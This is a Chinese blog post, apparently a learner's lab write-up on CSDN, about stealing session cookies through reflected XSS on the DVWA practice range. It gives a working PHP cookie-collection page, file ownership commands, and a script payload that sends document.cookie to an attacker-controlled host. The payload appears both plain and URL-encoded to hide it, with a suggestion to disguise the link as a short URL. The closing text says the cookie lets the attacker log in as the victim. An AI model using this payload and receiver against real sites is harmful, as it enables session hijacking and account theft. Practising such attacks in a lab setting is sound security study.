使用xss钓鱼盗取用户cookie

那么流程如下: 

第一步:搭建用于接收cookie的web站点。

(第一部步是要对于kali虚拟机中apache服务有一定的了解和学习的,这样才可以来接收cookie,并且搭建一个web站点)

第二步:构建恶意链接发送给用户。

(这一步 要 尽量的去熟悉xss常用代码比如:

<script>document.lacation='URL/xxs.php?cookie='+document.cookie</script>)将其发送给想要攻击的用户在其带点击 时就可以将其cookie存入准备好的web站点中保存。

第三步:用户点击恶意链接,目标网站返回带有恶意代码的web页面。

第四步:浏览器解析web页面,执行恶意代码,跳转到搭建的web站点。

第五步:从搭建的web站点中获取用户cookie。

需要准备的环境

靶场:DVWA

工具:burpsuite,kali虚拟机

第一步;

搭建我们的web站点,用来接收用户cookie。

这里我用kali来模拟,打开我的kali虚拟机,开启apache服务,进入/var/www/html文件,写一个用来接收cookie的网页,代码如下:

<?php

$a=$_GET["cookie"];

$file=fopen("gtck.html","a") or exit("</br>未找到文件!");

fwrite($file,$a."</br>");

fclose($file);

?>

很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie。

 

这里因为是先学然后在开始做笔记的这样的话以前就创建过这个gtck.html,所以这里就创建gtck2.html来演示一下

之后还有很重要的一件事,我们要给这两个文件改一下权限,不然会导致写入不成功,用户传来的cookie我们无法保存,

首先为我们要查看一下运行apache的用户名,然后更改两个文件的权限。

然后kali对于 文件提权的代码如下:

ps -axu | grep apache #查看运行apache的用户名

chown www-data:www-data xssgc.php gtck.html

 # 更改文件权限

 先获得kali的IP这样便于下一步的操作,

浏览器访问http://192.168.145.135 /xss.php?cookie=5看看传入的值有没有保存在gtck.html里。 

 

 

这边可以看到也是保存到了gtck.html里面

在使用浏览器访问http://192.168.145.135 /xssgc.php?cookie=2,看看传入的值有没有保存在gtck.html里。

那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。

 

可以看到我们写入的1和2都保存到了

那么下面我们就来进行实际操作

第一步

构建恶意连接发送给用户

是用DVWA靶场来进行实验

然后选择反射型xss

 

 

由于我们之前对于xss(reflected)进行了操作所以这里就知道其 存在xxs(reflected)漏洞

那么我们下一步就是构建恶意代码,代码如下:

<script>document.location='http://192.168.145.135 /xssgc.php?cookie='+document.cookie</script>

这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户的cookie,document.location='url'起到页面加载后转到

我们网页的作用,document.cookie起到获取用户cookie的作用,那么拼接上dvwa的url就是:

localhost/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=<script>document.location='http://192.168.145.135 

/xssgc.php?cookie='+document.cookie</script>#

但是url里直接有代码就很明显,而且有时还会出错,所以我们要对payload进行url编码。

打开burp,选择decoder选项,输入我们的payload,选择url编码。

(当然也可以在一些在线编码网站上进行编码)

将编码后的paylod复制下来,然后拼接上url:

localhost/DVWA-master/DVWA-master/vulnerabilities/xss_r/?name=%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%30%2e%31%30%39%2f%78%73%73%67%63%2e%70%68%70%3f%63%6f%6f%6b%69%65%3d%27%2b%64%6f%63%75%6d%65a%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

这里就是经过bp编辑过的payload,这个的作用是可

 

以便于隐藏和以及可以更好的去达到获取cookie等用户信息的目的

这就是最后完整的url,我们还可以对其伪造一下,列如短链接啥的,不过只是为了演示这儿就不弄了。

好的,我下 一部步就开始对于这个payload使用DVWA靶场来进行

我们点击生成的恶意代码,来模仿用户点击的得到如下回应

 

 

去kali的gtck.html查看是否有cookie被保存

 

可以看到也是被保存了下来

这样的话也是成功的得到cookie这样就可以,以该用户的名义去登录其账号窃取其机密

可以看到也是被保存了下来

这样的话也是成功的得到cookie这样就可以,以该用户的名义去登录其账号窃取其机密

但是对于将所学的知识用于实践还是有点困难的,因为环境,插件以及新的代代码,都增加了学习的难度

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中插入恶意脚本来获取用户的敏感信息,如cookie。根据引用内容,可以看出这是一个关于XSS攻击的示例代码和描述。 引用\[1\]是一个PHP代码片段,它将通过GET请求获取的cookie信息写入到一个名为cookie.txt的文件中。 引用\[2\]是一个JavaScript代码片段,它将用户cookie信息发送到一个指定的URL,以便攻击者可以收集这些信息。 引用\[3\]描述了一个XSS攻击的实例,其中恶意脚本被插入到URL中,当用户访问该URL时,恶意脚本将被执行,导致用户cookie信息被显示出来。 要防止XSS攻击,开发人员应该对用户输入进行严格的过滤和转义,以确保恶意脚本无法被执行。用户也应该保持浏览器和操作系统的更新,并避免点击可疑的链接或下载未知来源的文件,以减少受到XSS攻击的风险。 #### 引用[.reference_title] - *1* *2* [xss盗取cookie原理剖析](https://blog.csdn.net/weixin_51692662/article/details/127407078)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [网络安全实验6 认识XSS & 盗取cookie](https://blog.csdn.net/qq_37672864/article/details/104119221)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值